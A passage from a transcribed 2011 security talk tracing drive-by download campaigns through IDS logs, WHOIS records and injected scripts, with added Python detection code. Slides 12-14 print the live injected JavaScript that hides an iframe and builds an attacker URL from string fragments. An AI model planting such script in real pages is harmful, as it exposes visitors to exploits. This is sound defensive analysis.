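Tag Name PDF_XFA_Script
:arg host=http://oligist.in&b=486def4
:server oligist.in
:URL /jb/lastrger.php

Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
:clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server skipetar.in
URL /jb/pda.js

Date/Time 2011-08-18 19:00:13
Tag Name PDF_XFA_Script
arg host=http://e1in.in/stat&u=root
server e1in.in
URL /stat/574a353789f/lastrger.php

Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server e1in.in
URL /stat/574a353789f/pda.js
"""

# Field lines may carry a leading ':' (as on slide 8); the value is the rest of the line.
FIELD_RE = re.compile(r"^:?(Date/Time|Tag Name|arg|clsid|server|URL)\s+(.+)$")
# Per-victim hex directories such as /574a353789f/ must not split a cluster.
HEX_DIR_RE = re.compile(r"/[0-9a-f]{8,}(?=/)")

def parse_events(text):
    """Split the dump into one dict per record (records are separated by blank lines)."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        matches = (FIELD_RE.match(line.strip()) for line in block.splitlines())
        events.append({m.group(1): m.group(2) for m in matches if m})
    return events

def pivot_key(ev):
    """IDS signature plus landing-script file name, ignoring host and random directories."""
    script = HEX_DIR_RE.sub("", ev["URL"]).rsplit("/", 1)[-1] or "/"
    return f"{ev['Tag Name']} {script}"

def linked_servers(events, min_events=2):
    """Keys seen at least min_events times, each with the sorted set of servers behind it."""
    groups = defaultdict(list)
    for ev in events:
        groups[pivot_key(ev)].append(ev["server"])
    return {k: sorted(set(v)) for k, v in groups.items() if len(v) >= min_events}
```

Running `linked_servers(parse_events(EVENTS_TEXT))` groups inaptly.in, oligist.in and e1in.in behind lastrger.php and skipetar.in with e1in.in behind pda.js; in practice the dump would come from the IDS export rather than a literal.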
  • 12. Example: o-strahovanie.ru, Sep 02. The injected script as found in the page, reflowed; the attacker's comment "4 osel" means "for the donkey", Russian slang for Internet Explorer, which has no localStorage:
    / ============ bbb ============
    document.xmlSettings.if_ik=false;
    if(window.localStorage){
      if(window.localStorage.if_ik){
        if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
      }else document.xmlSettings.if_ik=true;
    }else{ // for the "donkey" (IE: no localStorage)
      if(document.xmlSettings.getCookie('if_ik')){
        if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
      }else document.xmlSettings.if_ik=true;
    }
    if(document.xmlSettings.if_ik){
      if(window.localStorage) window.localStorage.if_ik=document.xmlSettings.time();
      else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{ expires:(document.xmlSettings.time() + 86400*365) });
      document.xmlSettings.iframe=document.createElement('iframe');
      document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
      document.body.appendChild(document.xmlSettings.iframe);
      document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
    }
    Cookie set on the victim: if_ik 1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
  • 13. Example: o-strahovanie.ru. The cookie branch of the same script, as highlighted on the slide:
    / ============ bbb ============
    else{ // for the "donkey" (IE: no localStorage)
      if(document.xmlSettings.getCookie('if_ik')){
        document.xmlSettings.iframe=document.createElement('iframe');
        document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
        document.body.appendChild(document.xmlSettings.iframe);
        document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}
    Cookie: if_ik 1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
  • 14. Example: o-strahovanie.ru
    else{ // for the "donkey" (IE: no localStorage)
    …
    document.body.appendChild(document.xmlSettings.iframe);
    document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}
    After concatenation: iframe.src='http://disregarding.in/xtqd2/08.php'
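An added Python example, not from the talk, that checks page source for the three traits of the injected block on slides 12-14: a URL assembled from string fragments, a 1x1 iframe pushed off the left edge, and the localStorage/cookie gate (2592000 seconds is 30 days, which is why a revisit from the same browser shows a clean page). The sample HTML is constructed around the slide-12 script.

```python
"""Flag the injection pattern from slides 12-14: an off-screen 1x1 iframe whose
src is assembled from string fragments, behind a 30-day localStorage/cookie gate."""
import re

# Constructed sample: a harmless page with the slide-12 script appended to it.
SAMPLE_HTML = """<html><body><h1>Insurance quotes</h1>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
<script>
document.xmlSettings.if_ik=false;
if(window.localStorage){ if(window.localStorage.if_ik){
 if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
 }else document.xmlSettings.if_ik=true;}
if(document.xmlSettings.if_ik){
 document.xmlSettings.iframe=document.createElement('iframe');
 document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
 document.body.appendChild(document.xmlSettings.iframe);
 document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}
</script></body></html>"""

CONCAT_RE = re.compile(r"(?:'[^']*'\s*\+\s*)+'[^']*'")      # runs of 'a'+'b'+...
CSSTEXT_RE = re.compile(r"cssText\s*=\s*'([^']*)'")          # inline iframe styling
GATE_RE = re.compile(r"(localStorage|getCookie)\b.*?\+\s*(\d{5,})\s*<", re.DOTALL)

def join_fragments(expr):
    """Collapse 'htt'+'p://'+... into the literal the browser ends up using."""
    return "".join(re.findall(r"'([^']*)'", expr))

def is_hidden_style(css):
    """A 1x1 box, or one pushed far past the left edge, is a frame nobody is meant to see."""
    props = {k.strip(): v.strip() for k, v in
             (p.split(":", 1) for p in css.split(";") if ":" in p)}
    tiny = props.get("width") == "1px" and props.get("height") == "1px"
    left = re.match(r"-(\d+)px$", props.get("left", ""))
    return tiny or (left is not None and int(left.group(1)) >= 1000)

def scan(html):
    """Return the recovered URLs and the flags a triage analyst would want."""
    result = {"concat_urls": [], "hidden_iframe": False, "gate_seconds": None}
    for m in CONCAT_RE.finditer(html):
        literal = join_fragments(m.group(0))
        if re.match(r"https?://", literal):
            result["concat_urls"].append(literal)
    result["hidden_iframe"] = any(is_hidden_style(m.group(1)) for m in CSSTEXT_RE.finditer(html))
    gate = GATE_RE.search(html)
    if gate:
        result["gate_seconds"] = int(gate.group(2))   # 2592000 s = 30 days on the slide
    result["suspicious"] = bool(result["concat_urls"]) and result["hidden_iframe"]
    return result
```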
  • 15. Drive By Download, o-strahovanie.ru, Sep 02 (diagram): PC connected to the Internet → Known server with iframe → Intermediate server disregarding.in ("OS, browser plugins, etc. INFO" / "Host ready"); Exploit server: NO exploit delivered; Malware server: NO malware delivered
  • 16. Drive By Download, o-strahovanie.ru, Sep 12 (diagram): PC connected to the Internet → Known server with iframe → Intermediate server disregarding.in ("OS, browser plugins, etc. INFO" / "Host ready") → Exploit server chamberwoman.in, janiculum.in (Exploit) → Malware server chamberwoman.in, janiculum.in (Malware)
  • 17. Example: o-strahovanie.ru
    Domain Name: DISREGARDING.IN
    Created On: 14-Jul-2011 11:09:59 UTC
    Registrant Name: Russell Rosario
    Registrant Street1: 136 Oakdale Avenue
    City: Winter Haven
    Registrant Country: US
    Email: russellsrosario@teleworm.com
    Name Server: NS1.PRIDES.ME
    Name Server: NS2.PRIDES.ME
    Domain Name: JANICULUM.IN, CHAMBERWOMAN.IN
    Created On: 12-Sep-2011 08:14 UTC
    Registrant Name: Russell Rosario
  • 18. Example: o-strahovanie.ru
    Domain Name: DISREGARDING.IN, Created On: 14-Jul-2011 11:09:59 UTC
    Domain Name: JANICULUM.IN, CHAMBERWOMAN.IN, Created On: 12-Sep-2011 08:14 UTC
    Registrant Name: Russell Rosario
    No Payload, because No Payload Requests? Are they looking for customers?
  • 19. Example: o-strahovanie.ru
    Domain ID: D5165642-AFIN
    Domain Name: DISREGARDING.IN
    Created On: 14-Jul-2011 11:09:59 UTC
    Registrant Name: Russell Rosario
    Registrant Street1: 136 Oakdale Avenue
    City: Winter Haven
    Registrant Country: US
    Email: russellsrosario@teleworm.com
    Name Server: NS1.PRIDES.ME
    Name Server: NS2.PRIDES.ME
  • 20. Russell Rosario
    Domain Name: FILTRATED.IN
    Created On: 14-Jul-2011 11:09:53 UTC
    Sponsoring Registrar: Directi Web Services Pvt. Ltd. (R118-AFIN)
    Registrant ID: TS_16731618
    Registrant Name: Russell Rosario
    Registrant Street1: 136 Oakdale Avenue
    Registrant City: Winter Haven
    Registrant State/Province: Florida
    Registrant Postal Code: 33830
    Registrant Country: US
    Registrant Phone: +1.8635571308
    Email: russellsrosario@teleworm.com
    Registered in the same minute: filtrated.in, raptnesses.in (Created On: 14-Jul-2011 11:09:56 UTC), tansies.in (Created On: 14-Jul-2011 11:10:03 UTC)
    But Sally Doesn't Know…
  • 21. Attack before public disclosure
    • Primary location for malicious sites: .IN
    • Physical servers location by IP-Address: Romania
    • Responsible person: Russell Rosario
    • Domains are new
  • 22. Domain owner is the same (Domain Name | Created On | Registrant Name)
    irrefutably.in | 15-Jul-2011 11:00:21 UTC | Russell Rosario
    comprador.in | 25-Jul-2011 05:59:54 UTC | Russell Rosario
    hyalines.in | 29-Jul-2011 09:39:33 UTC | Russell Rosario
    suffrago.in | 01-Aug-2011 05:35:12 UTC | Russell Rosario
    ruritanian.in | 01-Aug-2011 05:35:50 UTC | Russell Rosario
    Callout: 20-Jul-2011, Acrobat vulnerability, vendor notified
  • 23. Vulnerability reported to vendor
    VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
    VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
    VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
    VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
    X. DISCLOSURE TIMELINE: 2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers; 2011-09-14 - Public disclosure
    ZDI-11-310: Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability. Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor; 2011-10-26 - Coordinated public release of advisory
    ZDI-11-316: Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability. Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor; 2011-10-27 - Coordinated public release of advisory
  • 24. Harvesting machine started (Domain Name | Created On | Registrant Name)
    microdrili.in | 05-Aug-2011 07:13:08 UTC | Russell Rosario
    oligist.in | 05-Aug-2011 07:13:12 UTC | Russell Rosario
    provost.in | 05-Aug-2011 07:13:18 UTC | Russell Rosario
    vaginalitis.in | 05-Aug-2011 07:13:25 UTC | Russell Rosario
    kremlinology.in | 05-Aug-2011 07:13:35 UTC | Russell Rosario
    invariance.in | 05-Aug-2011 07:13:41 UTC | Russell Rosario
    alleghenian.in | 05-Aug-2011 07:13:48 UTC | Russell Rosario
    dandifies.in | 05-Aug-2011 07:14:06 UTC | Russell Rosario
    xenophoby.in | 05-Aug-2011 07:14:09 UTC | Russell Rosario
    alliaria.in | 05-Aug-2011 07:14:15 UTC | Russell Rosario
    skipetar.in | 05-Aug-2011 07:14:21 UTC | Russell Rosario
    inaptly.in | 05-Aug-2011 07:15:05 UTC | Russell Rosario
    allhallowtide.in | 05-Aug-2011 07:15:20 UTC | Russell Rosario
  • 25. But maybe someone knows?
    • Spamlists
    • AV Vendors
    • Safebrowsing
    • Securityfocus
  • 29. Securityfocus, Sep 07
    Sent: Wednesday, September 07, 2011 11:31 PM
    Subject: There is a strange GET request header in all web pages of my site? I'm worried about a Trojan attack!
    Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with the Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"
  • 30. PDF vulnerabilities public disclosure Sep 14. What to expect?
  • 31. PDF vulnerabilities public disclosure Sep 14. What to expect? NO GOOD NEWS, JUST EPIC FAIL for site administrators
  • 32. No good news. Hundreds of domains were registered: ITALIA-NEW.IN, BANER-KLERK.RU, BANK-KLERK.RU, BANNER-KLERK.RU, BLOGS-KLERK.RU, BUH-KLERK.RU, DAILY-KP.RU, FORUM-KLERK.RU, I-OBOZREVATEL.RU, INTERFAX-REGION.RU, JOB-KLERK.RU, KLERK-BANK.RU, KLERK-BANKIR.RU, KLERK-BIZ.RU, KLERK-BOSS.RU, KLERK-BUH.RU, KLERK-EVEN.RU, KLERK-EVENTS.RU, KLERK-LAW.RU, KLERK-NEW.RU, KLERK-NEWS.RU, KLERK-REKLAMA.RU, KLERK-RU.RU, KLERK-WORK.RU, KLERK2.RU, OBOZREVATEL-RU.RU, OBOZREVATELRU.RU, WIKI-KLERK.RU, PRESS-RZD.RU, RZD-RZD.RU, IPGEOBASE.IN, ***
  • 33. "New generation" (diagram): as on slide 3, but the iframe on the Known server now points either to the Intermediate server controlled by attacker or to an Other known server NOT controlled by attacker; the Intermediate server ("OS, browser plugins, etc. INFO" / "Host ready"), the Exploit server (Exploit) and the Malware server (Malware) remain controlled by the attacker
  • 34. Attack after public disclosure
    • Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO,…
    • Physical servers location by IP-Address: International
    • Domains registered to different spurious persons
    • Domain lifetime is roughly the time until it appears on blacklists
    • The attack refers to the malicious server for a short period of time, and to a well-known one almost all day long (blacklist evasion technique)
    • If you don't know the exact malware URL, the site redirects to a well-known server
    • Different types of payload used: password stealers, win lockers, and even "normal" (or another ZD) files installed
  • 35. Known sites examples: RZD.RU, Russian railroads
  • 37. Known sites examples: RZD.RU, Russian railroads
  • 39. Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
  • 41. Other examples: EG.RU (newspaper, 263 685 visits per day)
  • 42. Other examples: svpressa.ru (newspaper 276 720 visits per day)
  • 45. Another piece of news, another phone…
    • Legal
    • Faked
  • 56. What can we do?
    • Patch endpoints
    • Tighten the Internet filtering (default deny if possible)
    • No Internet surfing with admin rights
    • See what's happening (continuous monitoring)
    • Check if you're well (regular technical audits)
    • Educate people
  • 57. Credits
    • Sergey V. Soldatov, TBINFORM (TNK-BP Group)
    • Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group)
    • Wayne Huang, ARMORIZE
  • 58. THE END. Vladimir B. Kropotov, Information security analyst, TBINFORM (TNK-BP Group), vbkropotov@tnk-bp.com, kropotov@ieee.org